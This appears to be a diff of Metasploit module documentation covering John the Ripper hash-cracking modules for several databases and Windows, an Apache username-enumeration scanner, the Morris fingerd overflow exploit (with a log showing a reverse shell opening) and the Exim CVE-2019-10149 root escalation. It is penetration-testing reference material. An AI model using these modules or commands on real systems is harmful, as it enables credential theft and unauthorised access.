-[*] Cracking mssql05 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[+] mssql05_toto:toto
-[+] mssql_foo:foo
-[*] Cracking mssql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql_foo:FOO
-[+] mssql_foo:FOO
-[*] Cracking mssql12 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mssql12 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mssql12_Password1!:Password1!
-[+] mssql12_Password1!:Password1!
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mssql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
-                       mssql05_toto        toto                                                                                                                                                   Password            
-                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
-                       mssql_foo           FOO                                                                                                                                                    Password            
-                       mssql_foo           foo                                                                                                                                                    Password            
-                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
-                       mssql12_Password1!  Password1!                                                                                                                                             Password            
-                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
-
-```
@@ -1,139 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
-  based password hashes, such as:
-
-  * `mysql` (pre 4.1) based passwords
-  * `mysql-sha1` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
-creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_mysql_fast 
-msf5 auxiliary(analyze/jtr_mysql_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
-[*] Cracking mysql hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql_probe:probe
-[*] Cracking mysql-sha1 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] mysql-sha1_tere:tere
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_mysql_fast) > creds
-Credentials
-===========
-
-host  origin  service  public           private                                    realm  private_type        JtR Format
----  ------  -------  ------           -------                                    -----  ------------        ----------
-                       mysql_probe      probe                                             Password            
-                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
-                       mysql-sha1_tere  tere                                              Password            
-                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
-
-```
@@ -1,168 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
-  based password hashes, such as:
-
-  * `oracle` (<=10) aka `des` based passwords
-  * `oracle11` based passwords
-  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
-  * `oracle12c` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  For a detailed explanation of Oracle 11/12c formats, see
-  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
-
-  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
-  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
-
-## Verification Steps
-
-  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
-creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
-creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
-creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_oracle_fast 
-msf5 auxiliary(analyze/jtr_oracle_fast) > run
-
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
-[*] Cracking oracle hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] simon:A
-[+] SYSTEM:THALES
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
-[*] Cracking dynamic_1506 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1506 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
-[*] Cracking oracle11 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle11 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] DEMO:epsilon
-[+] oracle11_epsilon:epsilon
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
-[*] Cracking oracle12c hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking oracle12c hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] oracle12c_epsilon:epsilon
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_oracle_fast) > creds
-Credentials
-===========
-
-host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
-                       simon              A                                                                                                                                                                                                                                                                            Password            
-                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
-                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
-                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
-                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
-                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
-                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
-
-```
@@ -1,131 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
-  based password hashes, such as:
-
-  * `postgres` based passwords
-  * `raw-md5` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
-  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
-
-## Verification Steps
-
-  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_postgres_fast 
-msf5 auxiliary(analyze/jtr_postgres_fast) > run
-
-[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
-[*] Cracking dynamic_1034 hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked passwords this run:
-[+] example:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_postgres_fast) > creds
-Credentials
-===========
-
-host  origin  service  public   private                              realm  private_type  JtR Format
----  ------  -------  ------   -------                              -----  ------------  ----------
-                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
-                       example  password                                    Password      
-
-```
@@ -1,158 +0,0 @@
-## Vulnerable Application
-
-  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
-  based password hashes, such as:
-
-  * `LM`, or `LANMAN` based passwords
-  * `NT`, `NTLM`, or `NTLANMAN` based passwords
-
-  Sources of hashes can be found here:
-  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
-
-## Verification Steps
-
-  1. Have at least one user with an `nt` or `lm` password in the database
-  2. Start msfconsole
-  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
-  4. Do: ```run```
-  5. You should hopefully crack a password.
-
-## Options
-
-
-   **CONFIG**
-
-   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
-
-   **CUSTOM_WORDLIST**
-
-   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
-   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
-
-   **DeleteTempFiles**
-
-   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
-   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
-
-   **ITERATION_TIMEOUT**
-
-   The max-run-time for each iteration of cracking
-
-   **JOHN_PATH**
-
-   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
-   `john` and `john.exe`.
-
-   **KORELOGIC**
-
-   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
-   Default is `false`.
-
-   **MUTATE**
-
-   Apply common mutations to the Wordlist (SLOW).  Mutations are:
-
-   * `'@' => 'a'`
-   * `'0' => 'o'`
-   * `'3' => 'e'`
-   * `'$' => 's'`
-   * `'7' => 't'`
-   * `'1' => 'l'`
-   * `'5' => 's'`
-
-   Default is `false`.
-
-   **POT**
-
-   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
-   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
-   Default is `~/.msf4/john.pot`.
-
-   **USE_CREDS**
-
-   Use existing credential data saved in the database.  Default is `true`.
-
-   **USE_DB_INFO**
-
-   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
-   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
-
-   **USE_DEFAULT_WORDLIST**
-
-   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
-   `true`.
-
-   **USE_HOSTNAMES**
-
-   Seed the wordlist with hostnames from the workspace.  Default is `true`.
-
-   **USE_ROOT_WORDS**
-
-   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
-   is true.
-
-## Scenarios
-
-Create hashes:
-
-```
-creds add user:lm_password ntlm:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C jtr:lm
-creds add user:nt_password ntlm:AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C jtr:nt
-```
-
-Crack them:
-
-```
-msf5 > use auxiliary/analyze/jtr_windows_fast 
-msf5 auxiliary(analyze/jtr_windows_fast) > run
-
-[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-koittz
-[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1v82lkm
-[*] Cracking lm hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 1177Kp/s 1177Kc/s 1177KC/s PLANO..VAGRANT
-Session completed
-[*] Cracking lm hashes in single mode...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:02 DONE (2019-02-11 19:34) 0g/s 4634Kp/s 4634Kc/s 4634KC/s WAC1907..E1900
-Session completed
-[*] Cracking lm hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-Using default target encoding: CP850
-Warning: poor OpenMP scalability for this hash type, consider --fork=8
-Will run 8 OpenMP threads
-Press 'q' or Ctrl-C to abort, almost any other key for status
-0g 0:00:00:00 DONE (2019-02-11 19:34) 0g/s 41152Kp/s 41152Kc/s 41152KC/s 0766269..0769743
-Session completed
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[*] Cracking nt hashes in normal wordlist mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in single mode...
-Using default input encoding: UTF-8
-[*] Cracking nt hashes in incremental mode (Digits)...
-Using default input encoding: UTF-8
-[*] Cracked Passwords this run:
-[+] lm_password:password
-[+] nt_password:password
-[*] Auxiliary module execution completed
-msf5 auxiliary(analyze/jtr_windows_fast) > creds
-Credentials
-===========
-
-host  origin  service  public       private                                                            realm  private_type  JtR Format
----  ------  -------  ------       -------                                                            -----  ------------  ----------
-                       lm_password  password                                                                  Password      
-                       lm_password  e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-                       nt_password  password                                                                  Password      
-                       nt_password  aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c         NTLM hash     nt,lm
-
-```
@@ -0,0 +1,42 @@
+## Vulnerable Application
+
+This module determines if usernames are valid on a server running Apache with the `UserDir` directive enabled. 
+It takes advantage of Apache returning different error codes for usernames that do not exist and for usernames
+that exist but have no `public_html` directory.
+
+### Enabling  `UserDir` on Ubuntu 16.04 with Apache installed
+1. `sudo a2enmod userdir`
+2. `sudo service apache2 restart`
+
+## Verification Steps
+
+1. Do: ```use auxiliary/scanner/http/apache_userdir_enum```
+2. Do: ```set RHOSTS [IP]```
+3. Do: ```set RPORT [PORT]```
+4. Do: ```run```
+
+## Scenarios
+
+### Apache 2.4.18 on Ubuntu 16.04
+
+![apache_userdir_enum Demo](https://i.imgur.com/UZanfTI.gif)
+
+```
+msf5 > use auxiliary/scanner/http/apache_userdir_enum
+msf5 auxiliary(scanner/http/apache_userdir_enum) > set rhosts alderaan
+rhosts => alderaan
+msf5 auxiliary(scanner/http/apache_userdir_enum) > run
+
+[*] http://192.168.6.172/~ - Trying UserDir: ''
+[*] http://192.168.6.172/ - Apache UserDir: '' not found
+[*] http://192.168.6.172/~4Dgifts - Trying UserDir: '4Dgifts'
+[*] http://192.168.6.172/ - Apache UserDir: '4Dgifts' not found
+...
+[*] http://192.168.6.172/~zabbix - Trying UserDir: 'zabbix'
+[*] http://192.168.6.172/ - Apache UserDir: 'zabbix' not found
+[*] http://192.168.6.172/~vagrant - Trying UserDir: 'vagrant'
+[*] http://192.168.6.172/ - Apache UserDir: 'vagrant' not found
+[+] http://192.168.6.172/ - Users found: backup, bin, daemon, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, proxy, sshd, sync, sys, syslog, uucp
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -1,10 +1,13 @@
-## Introduction
+## Vulnerable Application
+
+### Description

 This module exploits a stack buffer overflow in `fingerd` on 4.3BSD.
+
 This vulnerability was exploited by the Morris worm in 1988-11-02.
 Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

-## Setup
+### Setup

 A Docker environment for 4.3BSD on VAX is available at
 <https://github.com/wvu/ye-olde-bsd>.
@@ -14,7 +17,7 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

-## Targets
+### Targets

 ```
 Id  Name
@@ -22,6 +25,10 @@ Id  Name
 0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
 ```

+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
 ## Options

 **RPORT**
@@ -31,46 +38,43 @@ port may be forwarded when NAT (SLiRP) is used in SIMH.

 **PAYLOAD**

-Set this to a BSD VAX payload. Currently only
+Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.

-## Usage
+## Scenarios
+
+### `fingerd` 5.1 on 4.3BSD

 ```
-msf5 exploit(bsd/finger/morris_fingerd_bof) > options
+msf5 > use exploit/bsd/finger/morris_fingerd_bof
+msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing

 Module options (exploit/bsd/finger/morris_fingerd_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
-   RHOSTS  127.0.0.1        yes       The target address range or CIDR identifier
-   RPORT   79               yes       The target port (TCP)
+   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


 Payload options (bsd/vax/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
-   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
-   LPORT  4444             yes       The listen port
-
-
-Exploit target:
-
-   Id  Name
-   --  ----
-   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-
+   LHOST                   yes       The listen address (an interface may be specified)

+msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf5 exploit(bsd/finger/morris_fingerd_bof) > set lhost 192.168.56.1
+lhost => 192.168.56.1
 msf5 exploit(bsd/finger/morris_fingerd_bof) > run

-[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Started reverse TCP handler on 192.168.56.1:4444
 [*] 127.0.0.1:79 - Connecting to fingerd
 [*] 127.0.0.1:79 - Sending 533-byte buffer
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.2:51992) at 2018-09-25 10:14:15 -0500
+[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.1:58015) at 2020-02-06 15:45:33 -0600

-whoami
-nobody
+who am i
+nobody   tty??   Feb  6 13:45
 cat /etc/motd
 4.3 BSD UNIX #1: Fri Jun  6 19:55:29 PDT 1986

@@ -2,7 +2,7 @@

 Exim 4.87 - 4.91 Local Privilege Escalation

-This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149). 
+This module exploits a flaw found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to command execution with root privileges (CVE-2019-10149).

 Both meterpreter shell and classic shell are supported. The exploit will upload the specified `payload`, set the suid bit, and execute it to create a new root session. In order for the new session to be a root one, both `PrependSetuid` and `PrependSetgid` must be set to true (which is the default configuration for the exploit), and the `WritableDir` must be mounted without `nosuid`.

@@ -37,10 +37,10 @@ The port that exim is listening to. On most cases it will be port 25 (which is t
 ## ForceExploit

 Force exploit even if the current session is root.
-    
-## SendExpectTimeout

-Timeout per send/expect when communicating with exim.
+## ExpectTimeout
+
+Timeout for Expect when communicating with exim.

 ## WritableDir

@@ -54,9 +54,9 @@ A directory where we can write files (default is /tmp).
 ```
 meterpreter > getuid
 Server username: uid=1000, gid=1000, euid=1000, egid=1000
-meterpreter > 
-Background session 1? [y/N]  
-msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc 
+meterpreter >
+Background session 1? [y/N]
+msf5 exploit(multi/handler) > use exploit/linux/local/exim4_deliver_message_priv_esc
 msf5 exploit(linux/local/exim4_deliver_message_priv_esc) > set session 1
 session => 1
